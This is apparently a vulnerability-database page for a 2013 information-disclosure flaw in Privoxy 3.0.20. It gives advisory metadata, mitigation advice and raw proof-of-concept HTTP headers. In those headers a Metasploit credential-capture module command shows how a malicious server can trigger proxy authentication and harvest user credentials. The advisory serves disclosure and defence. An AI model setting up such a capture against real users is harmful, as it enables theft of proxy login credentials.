Privoxy Information Disclosure Vulnerabilities

vendor:

Privoxy

by:

SecurityFocus

7,5

CVSS

HIGH

Information Disclosure

200

CWE

Product Name: Privoxy

Affected Version From: 3.0.20

Affected Version To: 3.0.20

Patch Exists: YES

Related CWE: N/A

CPE: privoxy

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2013

Privoxy Information Disclosure Vulnerabilities

Privoxy is prone to multiple information-disclosure vulnerabilities. Attackers can exploit these issues to gain access to the user accounts and potentially obtain sensitive information. This may aid in further attacks.

Mitigation:

Ensure that Privoxy is up to date and that all users are using strong passwords.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/58425/info

Privoxy is prone to multiple information-disclosure vulnerabilities.

Attackers can exploit these issues to gain access to the user accounts and potentially obtain sensitive information. This may aid in further attacks.

Privoxy 3.0.20 is affected; other versions may also be vulnerable. 

Response Code (current).: 407

Response Headers (as seen by your browser).:

HTTP/1.1 407 Proxy Authentication Required
Date: Mon, 11 Mar 2013 17:01:59 GMT
Server: ./msfcli auxiliary/server/capture/http set SRVPORT=80
Proxy-Authenticate: Basic
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 571
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Request Headers (as seen by the remote website)

Host: c22.cc
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/
Connection: keep-alive